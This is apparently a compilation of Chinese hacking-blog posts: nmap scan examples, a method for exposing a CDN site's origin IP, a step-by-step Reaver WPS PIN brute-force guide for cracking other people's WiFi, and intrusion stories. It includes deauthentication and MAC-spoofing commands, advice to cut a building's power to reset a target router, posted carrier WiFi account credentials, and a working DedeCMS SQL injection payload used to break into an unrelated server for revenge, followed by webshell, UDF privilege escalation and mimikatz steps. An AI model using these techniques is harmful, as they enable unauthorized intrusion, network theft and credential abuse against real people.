--ip-options <options>: Send packets with specified ip options --ttl <val>: Set IP time-to-live field --spoof-mac <mac address/prefix/vendor name>: Spoof your MAC address --badsum: Send packets with a bogus TCP/UDP/SCTP checksum OUTPUT: -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, and Grepable format, respectively, to the given filename. -oA <basename>: Output in the three major formats at once -v: Increase verbosity level (use -vv or more for greater effect) -d: Increase debugging level (use -dd or more for greater effect) --reason: Display the reason a port is in a particular state --open: Only show open (or possibly open) ports --packet-trace: Show all packets sent and received --iflist: Print host interfaces and routes (for debugging) --log-errors: Log errors/warnings to the normal-format output file --append-output: Append to rather than clobber specified output files --resume <filename>: Resume an aborted scan --stylesheet <path/URL>: XSL stylesheet to transform XML output to HTML --webxml: Reference stylesheet from Nmap.Org for more portable XML --no-stylesheet: Prevent associating of XSL stylesheet w/XML output MISC: -6: Enable IPv6 scanning -A: Enable OS detection, version detection, script scanning, and traceroute --datadir <dirname>: Specify custom Nmap data file location --send-eth/--send-ip: Send using raw ethernet frames or IP packets --privileged: Assume that the user is fully privileged --unprivileged: Assume the user lacks raw socket privileges -V: Print version number -h: Print this help summary page. EXAMPLES: nmap -v -A scanme.nmap.org nmap -v -sn 192.168.0.0/16 10.0.0.0/8 nmap -v -iR 10000 -Pn -p 80 SEE THE MAN PAGE (http://nmap.org/book/man.html) FOR MORE OPTIONS AND EXAMPLES
3.1Nmap执行TCP扫描
-sT 对TCP进行扫描
-p- 对所有端口扫描
-PN 禁用Nmap网络发现功能,假定所有系统都是活动的
root@walfred:~# nmap -sT -p- -PN 192.168.115.1 Starting Nmap 6.47 ( http://nmap.org ) at 2014-10-23 20:38 CST Stats: 0:12:34 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 90.20% done; ETC: 20:51 (0:01:22 remaining) Stats: 0:16:16 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 94.41% done; ETC: 20:55 (0:00:58 remaining) Nmap scan report for 192.168.115.1 Host is up (0.0022s latency). Not shown: 65533 closed ports PORT STATE SERVICE 23/tcp open telnet 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 1274.21 seconds
3.2Nmap执行UDP扫描
扫描udp也是有理由的,比如一些基于udp的服务,SNMP、TFTP、DHCP、DNS等等
root@walfred:~# nmap -sU 192.168.115.188 Starting Nmap 6.47 ( http://nmap.org ) at 2014-10-23 20:21 CST Nmap scan report for 192.168.115.188 Host is up (0.00069s latency). Not shown: 994 closed ports PORT STATE SERVICE 137/udp open netbios-ns 138/udp open|filtered netbios-dgm 500/udp open|filtered isakmp 1900/udp open|filtered upnp 4500/udp open|filtered nat-t-ike 5355/udp open|filtered llmnr MAC Address: xxxxxxxxxxxxxx (Universal Global Scientific Industrial Co.) Nmap done: 1 IP address (1 host up) scanned in 974.78 seconds
3.3Nmap执行SYN扫描
nmap默认就是这种方式。这种方式要比TCP扫描快,因为只执行三次握手的前两次。也不会造成拒绝服务攻击
root@walfred:~# nmap -sS -p- -PN 192.168.115.1 Starting Nmap 6.47 ( http://nmap.org ) at 2014-10-23 20:26 CST Nmap scan report for 192.168.115.1 Host is up (0.0020s latency). Not shown: 65533 closed ports PORT STATE SERVICE 23/tcp open telnet 80/tcp open http MAC Address: xxxxxxxxxxxxxx (Digital China (Shanghai) Networks) Nmap done: 1 IP address (1 host up) scanned in 368.52 seconds
哇偶,竟然开放了telnet....
3.3Nmap执行Xmas扫描
RFC文档描述了系统的技术细节,因此如果得到RFC文档,那么就可能找到系统的漏洞,xmas和null扫描的目的正是基于这一原因。
如果系统遵循了TCP RFC文档,那么不用完成连接,仅仅在发起连接的时候,namp就可以判断出目标系统的状态。
但是一般xmas针对unix或者linux系统比较有效。
root@walfred:~# nmap -sX -p- -Pn 192.168.115.1 Starting Nmap 6.47 ( http://nmap.org ) at 2014-10-23 20:42 CST Nmap scan report for 192.168.115.1 Host is up (0.0029s latency). Not shown: 65533 closed ports PORT STATE SERVICE 23/tcp open|filtered telnet 80/tcp open|filtered http MAC Address: XXXXXXXXXXXXX (Digital China (Shanghai) Networks) Nmap done: 1 IP address (1 host up) scanned in 382.91 seconds
3.4Nmap执行Null
root@walfred:~# nmap -sN -p- -Pn 192.168.115.1 Starting Nmap 6.47 ( http://nmap.org ) at 2014-10-23 20:49 CST Stats: 0:04:54 elapsed; 0 hosts completed (1 up), 1 undergoing NULL Scan NULL Scan Timing: About 78.30% done; ETC: 20:55 (0:01:20 remaining) Nmap scan report for 192.168.115.1 Host is up (0.0018s latency). Not shown: 65533 closed ports PORT STATE SERVICE 23/tcp open|filtered telnet 80/tcp open|filtered http MAC Address: XXXXXXXXXXXXX (Digital China (Shanghai) Networks) Nmap done: 1 IP address (1 host up) scanned in 376.37 seconds
如何快速简单地找到使用了CDN加速的网站的真实IP 网络安全
对于一个玩渗透的孩子来说,找到使用了CDN加速的网站的源IP(真实IP),就是第一道门槛啊,没找到源IP就别想其他的环节了。。。。
恰好,今天,我在逛一个常去的网站的时候,挺喜欢的!就简单的做了一个检测。。。已通知管理员
随手把域名丢进站长工具里面查看了一下,发现使用了CDN,网宿科技的,没怎么听说过,
开了好多端口啊。。。21 22 23 1443 3389 不知道是管理员胆子大呢,还是故意是个陷阱。。。暂时不知道
为了验证一下是不是真的,那就需要找到源ip地址,几经google,百度 总算有了一点结果,使用 nslookup domain
从图中知道,域名加www解析出来的结果有 www.xxx.com。wscdns.com 明显是CDN加速服务器的,去掉www之后,得到了一个IP地址和域名,基本可以确定是源IP地址了,为了进一步验证,在站长网工具箱里面使用同IP网站查询,得到结果如下:
根据Kali Linux 上的 whatweb扫描的结果确定源IP就是 图中第一次的结果,因为301跳转到带有 www的域名上,第二次明显为cdn加速服务器的IP,两者的服务器一个为IIS 6.0 一个是IIS 7.5 的,都是ASP_NET 2.5 。
最后来链接服务器测试一下:
服务器是Windows server 2003 至于怎么拿下这个Windows server 2003 就是后面的事了(2003_So easy -_-|),信息收集到此就完成了60%,还没对网站进行扫描检测呢。
总结:我测试了自己的博客,发现并不能得到真实的IP地址,因为我的域名都做了cdn加速,所以在此提醒站长朋友们,记得使用cdn加速的时候把所有的二/三/...级域名等等都要做到位,不然很容易得到源IP,如果你的服务器又开放很多端口,就不太安全哦。尽管如此,想要得到源IP的方法还有很多,网上有专门的软件追踪真实IP,善用!我这只是一个简单的傻瓜式方法。。。再见
最新kali2.0 Linux编译安装RT2870/3070无线USB网卡驱动教程+reaver参数详解+PING方法策略 Linux
01.终端输入#lsusb,会看到再出现的几行中有USB、ralink等字样,一般是倒数第二行。。。确定下ID代码:ID 148f:5370 Ralink
02.下载驱动,可以google/百度搜索关键字----ralink rt2870/3070(根据自己的网卡型号来搜索)----进官网后选择Download字样的,只要芯片型号对就行,你说那要是不知道芯片型号?找度娘--搜索---你USB网卡型号+芯片型号(比如托实N95芯片型号)---度娘会告诉你芯片型号的!好了,这步搞定。
03.下载玩之后解压,tar -zxvf filename.tar.bz2 类似的。解压完毕后进入解压完毕的那个文件夹,然后进入 os/linux 目录下,编辑config.mk,可以使用命令 leafpad config.mk 之后在leafpad的窗口里搜索并找到,修改下面这两句,启用WPA特性:
HAS_WPA_SUPPLICANT=y
HAS_NATIVE_WPA_SUPPLICANT_SUPPORT=y
04.编译(需要root权限),make , makeinstall ,modprobe rt3070(根据自己的网卡型号),exit 。
注意:执行modprobe rt3070可能会产生一个警告: WARNING: All config files need .conf: /etc/modprobe.d/ndiswrapper, it will be ignored in a future release. 无视掉,没有关系!!!或许还有其他的警告或者是提示都不用管,稍等执行ifconfig -a 查看无线网卡驱动是否安装激活。
如果想系统每次启动就会自动驱动这张网卡,可以将模块加入/etc/modules,这样代码:echo rt3070 >> /etc/modules
下面介绍一下reaver与ping 之间的详细参数 和一些破解时设置的技巧,菜鸟请看,绝对有用,老鸟无视,直接飞过~~~~~
【Reaver v1.4 参数说明】
-i, --interface=<wlan> Name of the monitor-mode
interface to use
网卡的监视接口,通常是 mon0
-b, --bssid=<mac> BSSID of the target AP AP 的
MAC 地址
Optional Arguments:
-m, --mac=<mac> MAC of the host system
指定本机 MAC 地址,在 AP 有 MAC 过滤的时候需要使用
-e, --essid=<ssid> ESSID of the target AP 路由器的
ESSID,一般不用指定
-c, --channel=<channel> Set the 802.11 channel for
the interface (implies -f) 信号的频道,如果不指定会自动扫
描
-o, --out-file=<file>Send output to a log file [stdout]
标准输出到文件
-s, --session=<file> Restore a previous session file
恢复进程文件
-C, --exec=<command> Execute the supplied
command upon successful pin recovery pin 成功后执行
命令
-D, --daemonize Daemonize reaver
设置 reaver 成 Daemon
-a, --auto Auto detect the best advanced options
for the target AP 对目标 AP 自动检测高级参数
-f, --fixed Disable channel hopping
禁止频道跳转
-5, --5ghz Use 5GHz 802.11 channels 使用 5G 频道
-v, --verbose Display non-critical warnings (-vv for
more) 显示不重要警告信息 -vv 可以显示更多
-q, --quiet Only display critical messages 只显示关键信息
-h, --help Show help 显示帮助 Advanced Options:
-p, --pin=<wps pin> Use the specified 4 or 8 digit
WPS pin
直接读取 psk(本人测试未成功,建议用网卡自带软件获取)
-d, --delay=<seconds> Set the delay between pin
attempts [1]
pin 间延时,默认 1 秒,推荐设 0
-l, --lock-delay=<seconds> Set the time to wait if
the AP locks WPS pin attempts [60] AP 锁定 WPS 后
等待时间
-g, --max-attempts=<num> Quit after num pin
attempts
最大 pin 次数
-x, --fail-wait=<seconds> Set the time to sleep after
10 unexpected failures [0]
10 次意外失败后等待时间,默认 0 秒
-r, --recurring-delay=<x:y> Sleep for y seconds every
x pin attempts
每 x 次 pin 后等待 y 秒
-t, --timeout=<seconds> Set the receive timeout
period [5] 收包超时,默认 5 秒
-T, --m57-timeout=<seconds> Set the M5/M7
timeout period [0.20] M5/M7 超时,默认 0.2 秒
-A, --no-associate Do not associate with the AP
(association must be done by another application)
不连入 AP(连入过程必须有其他程序完成)
-N, --no-nacks Do not send NACK messages
when out of order packets are received
不发送 NACK 信息(如果一直 pin 不动,可以尝试这个参数)
-S, --dh-small Use small DH keys to improve crack
speed
使用小 DH 关键值提高速度(推荐使用)
-L, --ignore-locks Ignore locked state reported by the
target AP 忽略目标 AP 报告的锁定状态
-E, --eap-terminate Terminate each WPS session with
an EAP FAIL packet
每当收到 EAP 失败包就终止 WPS 进程
-n, --nack Target AP always sends a NACK [Auto] 对
目标 AP 总是发送 NACK,默认自动
-w, --win7 Mimic a Windows 7 registrar [False] 模拟
win7 注册,默认关闭
PIN码
破解简单解释:
PIN码分前4和后4,先破前4只有最多一万个组合,破后4中的前3只有一千个组
合,一共就是一万一千个密码组合。 10的4次方+10的3次方=11000个密码组合。
当reaver确定前4位PIN密码后,其任务进度数值将直接跳跃至90.9%以上,也就是
说只剩余一千个密码组合了。总共一万一千个密码!
学习过程
1.在虚拟机找到点击打开。如果电脑装有多个无线网卡,请先发指令
ifconfig -a 确认你用哪一个网卡WLAN0或是WLAN1
(下面的指令都是以单一网卡WLAN0为例)
2.出现root Shell窗口。敲入第一条命令“ifconfig wlan0 up” 加载
usb网卡。
接下来“airmon-ng start wlan0” 监听模式已激活到了
mon0。
如果出现网卡没有正确加载,8187驱动RF-kill的参考后记1解决问题。
3.第二条命令“airodump-ng mon0” 查看周边路由/AP的信息。
记录下你要学习的路由MAC地址。提供几个查看可以使用PIN码学习路由的方法。
特别提示:只有AP开启了WPS、QSS功能,才可以用PIN法学习PSK密码!如何查看
AP是否开了WPS、QSS呢提供几个小方法?
a) reaver1.3下使用使用命令walsh -imon0-C 查看针对xiaopangOS3.2版本
b) reaver1.4下用新的指令:WASH -i mon0 -C C是大写在wps locked一项中有显示的。
c) WIN7下,用通常的方式连接AP,如果在提示输入密码框下面,出现“通过按路由器
按钮也可以连接”,就确认此AP开了WPS、QSS。
d) 在螃蟹软件中——可用网络——模式下带N,G的这个不是很准
最准确的是下面这个选项
点击PIN输入配置,选择接入点,哈哈出来了吧,这里面都是可以学习的目标
需要注意的是,查看后面有的是不支持pin码连接的,这样的就别弄了,后果你知道。
1. 重新开启一个root Shell窗口,第三条命令“reaver -i mon0 -b MAC -a -S -vv” 抓PIN
码。注意,MAC中冒号不可省略,MAC地址的字母大小写均可,-S是大写字母, -vv
是两个V不是W!# _) }
-i 监听后接口名称
-b 目标mac地
-a 自动检测目标AP最佳配
-S 使用最小的DH key(可以提高破解速度)
-vv 显示更多的非严重警告
-d 即delay每穷举一次的闲置时间 预设为1秒
-t 即timeout每次穷举等待反馈的最长时间
-c指定频道可以方便找到信号,如-c1 指定1频道,大家查看自己的目标频道做相应修改 (非TP-LINK路由推荐–d9 –t9参数防止路由僵死
reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)
小结-学习时应因状况调整参数(-c后面都已目标频道为1作为例子
目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t .5 -c 1
目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1
学习开始了,然后就是漫长的等待。
如果信号好的话2-4小时内进度走到100%你就会有惊喜发现。
PIN破密对信号要求极为严格,如果信号稍差,可能导致破密进度变慢或者路由死锁等(重
复同一个PIN码 或 timeout)。AP关闭了WPS、或者没有QSS滴,会出现
WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
5.如果出现超长的wpa PSK可以使用第四条命令“reaver –i mon0 –b MAC –p WPA PSK”
MAC为目标的mac地址,WPA PSK为获取到的超长密码。作用是将指定的pin码获取
wpa密码psk。
6.常用命令截图
7.不是所有的路由都支持pin学习。AP关闭了WPS、或者没有QSS滴,会出现
WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX) 学习过程中也可随时随地按
Ctrl+C终止破解,重复同一个PIN码 或 timeout可终止,reaver
会自动保存进度。保存进度后重复第2-4项内容,先看看AP信号强弱或是否关机,继续
学习,则重复命令reaver -i mon0 -b MAC -vv这条指令下达后,会让你选y或n,选y后
就继续了。当reaver确定前4位PIN密码后,其工作完成任务进度数值将直接跳跃至90.9%
以上,也就是说只剩余一千个密码组合了(总共一万一千个密码)。这个时候离成功就差
一步之遥了,呵呵hold住哦!!!
小技巧:只要Root Shell窗口不关闭,按方向键的上下会出现你输入过的命令方便调用。 8.虚拟机中快照的保存方法
找到这两个图标,第一个是保存快照。第二个图标是加载上一次的快照。
快照的作用:类似迅雷的断点续传,可以保存上次学习的进度,防止目标pin僵死,无法
继续前功尽弃,这是光盘启动、u盘启动、硬盘启动都无法避免的。而虚拟机则可为自己
上一份保险。
载入快照后如果无法继续,可以尝试先卸载掉usb网卡,然后重新加载。然后在开启窗口
继续上次的学习。学习过程中也可随时随地按Ctrl+C终止破解,重复同一个PIN码 或
timeou t可终止,reaver会自动保存进度。
reaver -i mon0 -b MAC -vv这条指令下达后,会让你选y或n,选y后就继续了。
9.光盘启动、u盘/硬盘启动保存学习进度的方法
reaver1.3的保存路径:打开桌面最后边一个图标xfec 定位到/etc/reaver下,有一个wpc
后缀的文件,名字是你学习的目标的mac地址,复制到你的U盘,路径是/mnt/sdb1(一
般是这个,自己找找,要是没有东西就右键mount),以后重启到xiaopanOS,把这文件
复制到原来的路径,再试试,可以载入进度了!o(∩_∩)o 哈哈
reaver1.4的保存路径:保存目录:/usr/local/etc/reaver
如果xfe文件管理器未获得ROOT权限。请先运行root shell后输入xfe即可获得root权
限。保存方法同上。下次重启动后,再手工复制到/etc/reaver/ 目录下即可
MAC地址.wpc 其实是个文本文件,格式与破密用字典酷似,其第一行和第二行,分别是
4位数和3位数的指示位置数(+4)。如果进度到99.9%后,AP死机,可打开它,总共1000
个3位数,找出剩余的十几个PIN码,用QSS、WPS客户端软件,手动测试、破密。
如果是跑了99.99%死机, 意味吗? 你懂的吧? 最后一个PIN就是。
以下这个命令是指定PIN码,获得WPA 密码PSK
reaver -i mon0 -b MAC -p PIN8位数
如果上述措施不后,仍不见PSK密码,可能因软件原因,漏码了!需要重新跑后三位数!
(前四位正确的话)reaver -i mon0 -b MAC -p PIN前4位数
1.遇见8187驱动RF-kill的 xiaopanos
对8187的网卡支持不是太好,有时会出现驱动加载不了,就是输入第一条命令
后出现operation not possible due to RF-kill,我想大部分人也遇到过把。新版本0.34使用
命令rfkill unblock all解决这个问题,容易出现问题的是0.3.2版本的。
第一种尝试的解决办法:这时候就断开USB,等上大概10几秒把再插上,连续插拔几次
总有一次会好。
第二种尝试的解决办法:先运行一下奶瓶扫描一会,然后退出奶瓶。虚拟机USB图标(USB
图标上的小点)由深绿变成浅绿色,变浅绿就输入
ifconfig wlan0 up
airmon-ng start wlan0
第三种解决办法:出现错误后的解决
a.Root Shell窗口敲击命令“ifconfig -a”,查看最后一项是否出现wlan0,这个就是你的无
线网卡。如果没有出现拔插网卡,直到测试出现wlan0。
b.接下来输入第二条命令“ifconfig wlan0 up”,接下来第三条“airmon-ng start wlan0”载入
网卡。如果出现operation not possible due to RF-kill,不要惊慌继续输入命令“airmon-ng start
wlan0”多输入几次,然后拔出USB网卡,再插入,重复第2步的命令。一般情况下就会
正常载入了括号内只会显示monitor mode enabled on mon0,不会出现operation not possible
due to RF-kill,如果不行以上步骤再次重复,直到解决。
c.输入“airodump-ng mon0”(如果括号内显示的是monitor mode enabled on mon1,相应的
命令就改为airodump-ng mon1,其他的类似),测试一下,要是可以正常扫描,说明8187L加载成功,就可以reaver了,你懂的!
d.小技巧:只要Root Shell窗口不关闭,按方向键的上下会出现你输入过的命令方便调用。
2. reaver
破密进度表 全能保存办法
用u盘或者硬盘启动xiaopanos可以保存进度,重启不会丢失,方法如下:
打开桌面最后边一个图标xfec 定位到/etc/reaver下,有一个wpc后缀的文件,名字是你
破解的mac地址,复制到你的U盘,路径是/mnt/sdb1(一般是这个,自己找找要是没有东
西就右键mount),以后重启到xiaopanOS,把这文件复制到原来的路径,再试试,可以
载入进度了
reaver的进度表文件保存在/etc/reaver/MAC地址.wpc 用资源管理器,手工将以MAC地
址命名的后辍为.wpc的文件拷贝到U盘或硬盘中,下次重启动后,再手工复制到
/etc/reaver/ 目录下即可。
MAC地址.wpc 其实是个文本文件,格式与破密用字典酷似,如果进度到99.9%后,AP
死机,可打开它,总共1000个3位数,找出剩余的十几个PIN码,用QSS、WPS客户
端软件,手动测试、破密。
3. PIN
破密降低timeout、同码重复的非常给力措施之一
首先是PIN难易与MAC无关的!主要跟路由所在频道的 信道拥挤程度相关!(同一频道
中有几个路由,特别是强信号的AP会相互干扰,造成 timeout
一般AP默认频道cn 6,部分为
解决“同频干扰”、“邻频干扰”的原则:设法 调虎离山(这个我想大家都懂的)。
将能调动的AP远离破密AP至少3个CN以上
5.如果90.9%进程后死机或停机,可以使用-p参数
请记下PIN前四位数,用指令:reaver -i mon0 -bMAC -a -vv -p XXXX(PIN前四位数
会从指定PIN段起破密.
6.只有AP开启了WPS、QSS功能,才可以用PIN法破PSK密码!如何查看AP是否开了WPS、QSS呢?
reaver1.3下 使用airodump-ng -mon0 MB一栏下,出现 54e. 是开11N的WPS的(不是
54e是有小数点的54e.)
reaver1.4除可使用上述命令外也可以用新的指令:WASH -imon0-C在wps locked一项中
有显示的。
WIN7下,用通常的方式连接AP,如果在提示输入密码框下面,出现“通过按路由器按
钮也可以连接”,就确认此AP开了WPS、QSS。PIN破密对信号要求极为严格,如果信
号稍差,可能导致破密进度变慢或者路由死锁等(重复同一个PIN码 或timeout)。AP
关闭了WPS、或者没有QSS滴,会出现
WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
7. 通过mac地址查找路由品牌 有时候
破解时SSID通常被改成其他的 不好判断 可以打开下面这个网址:
http://standards.ieee.org/develop/regauth/oui/public.html
输入你的ap mac的前三位,接下来就不用说了吧?破解 至少也要知道对方用的是啥路由
总结发现这个方法最快 也最好用 对破解有一定的帮助
8. 很简单地扫描支持pin解的路由
在xiaopanos下打开一个root shell 如果是1.3或之前的的就键入walsh -i mon0 -C(一般是
这个,不是的话改成你的网卡,注意c要大写)
1.4要把walsh改成wash 片刻就罗列出周围支持wps的路由,在wps locked一项如果是
N的话就可以pin破解
9. 在
xiaopanOS 中,打开的窗口最小化后,就找不到了,因为不像windows有下方的任
务栏,此时按Alt+Tab键,会出现一个弹出菜单,选择rootshell,原来最小化的窗口就会
出现了。
10. PIN僵死锁定后,无奈的方法。也可以攻击隐藏ssid的路由(不推荐使用)aireplay-ng-0 1000 -a SSID
的MAC -c 合法客户端的MAC 网卡端口 就是让客户端断开连接1000次
11. 【公共
wifi密码】
中国移动:卡号:15821275836 密码:159258;卡号:15800449592 密码:159258;卡
号:15800449954 密码:159258;卡号:15800449940 密码:159258。中国电信:但凡
你的手机能搜到电信的chinanet的热点覆盖,全国公免账号:07953591377密码3591377。
有福同享!
12. 利用虚假连接调整天线,快速穷举pin码的方法;
首先利用8187管理软件来精确调整天线的位置。(因为8187界面非常直观,友好,可以
看到当前连接ap源的信号强度和接收品质的动态条)把信号先调得接收强度,接收品质
为最优秀为破解来打下扎实的基础。
最笨的方法就是把要破解的信号连接上。那你会问了能连接上就不用破了。是兄弟们没
有反应过来,呵呵,听我慢慢说:你可以虚假的连接啊。比如:要破这个1234p这个ssid
的信号。双击这个信号后会弹出输入密码对话框,你可以按10个1嘛。下面也一样输入
10个1 。这样就会虚假连接。能在8187管理界面上看到信号接收强度和接收品质的动
态图。虽然上不去网,但是完全可以根据这两项把天线调整到最佳的接收状态,使之
信号校对到最优秀状态。把信号调整好后,你说破解顺利不啊?还会出timeout这种丢包
情况吗?会相当顺利的。呵呵呵呵。
配合破解要有好的定向天线,我是硬件版块的兄弟。我们经常自己diy大增益的天线。使
我们的信号强上更强,这叫好马配好鞍,使破解无往而不利,综上所术:这就是我要分享
的小经验。我最慢也没有超过30分钟 的啊。一般全是15分钟就搞定了。。新手兄弟:
明白了吧 .
13. 破解隐藏SSID前提:一定要有合法的客户端连上
1.在bt3/4/5下先打开一个shell,输入airodump-ng 网卡端口
2.打开另一个shell,输入aireplay-ng-0 10 -a AP的MAC -c 合法客户端的MAC 网卡端口,
可能这个命令由于频道不对会出错,这时就要多重输几次(重输技巧:只要按一下向上键就
可以了,如果不行,就是不是合法客户端,要再试其它的客户端),直到提示成功为止。
3.然后就可以在上个shell,看到显示出来的SSID图是借用论坛的XD的,希望是不会介意
吧 连接隐藏SSID: 输入SSID选好网络身份验证加密方式及破解出来的密码,点上即使此网络未广播也进行
连接,然后确定就看到右下角小电脑摇起来了吧!如果连不了,可能是因为这个信号太弱和
有太强的信号影响,这时就要把可用网络里的AP列表全部删除,只留下那个刚新增的AP就可以了.如果还是连不上,那就是因为这个信号太弱,windows认为它没有连接的价值,又
或是AP还设置了MAC、IP过滤。
14.在xiaopangOS下修改usb网卡mac地址的方法
macchanger -m 00:16:6f:ab:25:f9 wlan0
15. PIN
破密正常运行中,信号质量也很好的情况下,突然出现出现同码循环和大量
timeout,可能是如下原因造成的(排除关机状态)。
reaver只支持11N的PIN破密,11n先验证前4位码,11g也有PIN功能,是全码验证。
现在多数AP的无线模式是混和11bgn,当有11g设备接入时,AP自动从11N降至11g
此时,reaver会出现同码循环重复timeout! 甚至会出现WARNING: Failed to associate with
XX:XX:XX:XX:XX:XX (ESSID: XXXX)实证中,在排除同频干扰因素后,通过扫描无线
网络,发现路由器,确实从54e.模式降为54.模式了。有人把此种现象称为临时性WPS、
PIN功能自锁从收集情况分析,目前破密的主要是TP-LINK的路由器!
解决办法:
等待这个11g设备退出无线接入,断电重启,AP自动从11g恢复至11N模式。如果遇
到上很长很长时间不重启的顽固AP,我想最有效的办法就是我们动手帮它重启,找到附) ~
近(路由器一定离我们不远)楼内单位总电源开关!下步该知道怎么办了吧————终)
极秘籍:拉开关断电,再推上开关,回家继续。
相关推荐:
破解了你的路由密码后,我还可以这样做,绝对不是蹭你网这么简单
Kali套件之nikto扫描网站漏洞应用小计
最新kali2.0 aircrack-ng 无法进入监听模式问题的解决办法 Linux
对于升级后的aircrack-ng 和以前的 大不一样,特别是监听模式的设置,很多人会出现找不到设备会命令出错的各种原因我们先去官网(http://www.aircrack-ng.org/doku.php?id=compatibility_drivers)确定自己网卡是否有被kali2集成后就可以按照以下步骤 进行新的命令操作:
第一步:在设置监听模式前先输入airmon-ng check kill结束进程
第二步:和以前一样载入网卡airmon-ng start wlan0(自己的网卡名)
第三步:他会自动创建一个 wlan0mon接口 记住这个 接口名 而不是以前的mon0
第四步:建立监听 airodump-ng wlan0mon
如果在第四步发现出现错误 那么 有三种可能第一 你的网卡不支持监听模式,第二你的wlan0mon输入错误,第三网卡被其他进程给调用无法获取
第三种情况解决方法:
执行airmon-ng check kill
执行 ifconfig wlan0mon up
airmon-ng stop wlan0mon
最后跳回上面的第二部进行
如果还不行 那就拔掉网卡 或重启
再次ifconfig 查找时候有
网卡 标识名一般以wlan开头如果没有 就 ifconfig wlan0 (或者wlan1 wlan2.。。。载入) up
发现了 并载入了 wlan0跟着第一步走一般不会出错
相关推荐:
破解了你的路由密码后,我还可以这样做,绝对不是蹭你网这么简单
Kali套件之nikto扫描网站漏洞应用小计
arp劫持某域名注册商 渗透测试
前段时间朋友在做一个网站, 就在某域名商那注册了一个米, 但是三天两头的出问题
找客服客服态度还很差, 说是自己的网络问题, 尼玛dns都找不到能是网络问题么? 擦...
于是乎夜半时分就帮朋友教训教训这个坑爹的域名商~~~
先是探测了一些基本信息, web使用的IIS7.5, 服务器是windows 2008
整个网站是.net写的, 于是开始找常见的一些漏洞, 发现整个系统还是比较安全, 除了一个反射型的XSS以外
没有发现其他更有价值的东西, 参数似乎是全局就过滤了, 所以注射这条路基本上堵死了..
想了一会, 就是为了教训教训这个域名商, 所以只要达到教训的目的就行了, 所以并不是非得日下
把他域名搞了岂不更爽? 再不济给他来个arp劫持也不错, 呵呵
先查了下域名商的域名, 是在Godaddy注册的, whois隐藏了, 现在不都说什么大数据大数据嘛..
于是我就在一些公开的社工库里面查了下站长的qq, 发现都没有信息, 到这里就卡死了..
既然域名那里不能入手, 那就玩玩C段吧.. 说起来也好久没弄这些了.
先用御剑扫一发~ 发现C段的站还挺多的 - - 随便找了个windows2003服务器下手, 找到了一个dede
打开一看我就呆了, 这个站原来都被人搞过了, 主页挂上了某XX小组的黑页
既然别人能日下还改了主页说明这个站的站长似乎并没怎么打理网站, 顿觉有戏!
于是打开/data/admin/ver.txt看了下版本是20130911
这个版本看来还是比较老的了, 所以直接抄上前一段时间爆出来的织梦注入漏洞:
/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\'and+char(@`'`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat(0x3C6162633E,group_concat(0x7C,userid,0x3a,pwd,0x7C),0x3C2F6162633E),5,6,7,8,9%20from%20`%23@__admin`%23");
成功爆出来了帐号和密码
密码倒是很简单, 一下就破出来了. 只不过后台路径被改过了, 于是直接上谷歌, site:xxx.com inurl:login.php
找到了后台就简单了, 一顿XXOO拿到了shell, 这个大家都会就不细说了, 打开dede的配置文件一看, 我擦竟然直接就是root...
于是上传了一个有UDF提权功能的大马, 但是每次导出dll后安装的时候都提示不行, 一想不会是被杀了吧..
这里想了半天, 突然想到把后缀改一下呢, 于是随便弄了一个后缀. 改成了xxx.7b, 一安装, 竟然成功了
为了安全起见没有直接添加用户, 传了一个某黑客用mimikatz改出来的webshell版读取密码
成功把密码读了出来
看了下注册表3389是打开了的, 于是直接上服务器开撸, 没想到直接给我弹了个什么中断连接
“猥琐”成功XSS某网站 渗透测试
因为需求,对一个网站进行检测
各种扫描无果
于是开始进行各种xss
注册会员开始
问答处~~~~~~~
不会饶,还请大牛赐教!!
不会饶,还请大牛赐教!!
最后各种翻,各种翻啊~~!!
然后就看到了
哈哈哈,很多获取IP的方式都能弄,包括ip38
那就是我们的大杀器
然后退出,再登录一遍
——————————————————
OK
目地达到
注:原文出自t00ls.只是觉得够猥琐!转载之-_-| 如果不允许就告诉我.